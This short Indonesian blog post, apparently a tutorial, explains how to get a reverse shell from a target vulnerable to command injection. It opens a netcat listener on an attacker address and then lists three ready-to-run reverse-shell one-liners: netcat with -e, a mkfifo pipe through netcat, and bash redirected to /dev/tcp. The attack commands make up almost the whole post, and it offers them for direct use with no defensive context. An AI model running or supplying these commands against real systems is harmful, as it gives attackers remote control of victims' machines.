Skip to content Skip to sidebar Skip to footer

reverse shell di target

Penggunaan reverse shell di target.

Anggap saja kita dapet target yang vulnerable command injection, nah kan pengen dapet back connect tuh..

Misal ip kita : 10.10.10.10

kita bisa buka listen menggunakan netcat di komputer attacker untuk membuka port 8080 agar bisa mendapatkan koneksi balik dari target dengan perintah : nc -lvp 8080

Kemudian di target kita bisa mengeksekusi perintah untuk melakukan koneksi ke komputer attacker dengan perintah perintah berikut :

---------------
Jika netcat bisa menggunakan opsi -e

nc -e /bin/sh 10.10.10.10 8080

--------------

Jika netcat tidak bisa menggunakan opsi -e

rm /tmp/pipe; mkfifo /tmp/pipe; cat /tmp/pipe|/bin/sh -i 2>&1|nc 10.10.10.10 8080 > /tmp/pipe

--------------

--------------
Menggunakan /dev/tcp

bash -i >& /dev/tcp/10.10.10.10/8080 0>&1

--------------

Post a Comment for "reverse shell di target"

Image
Image
Image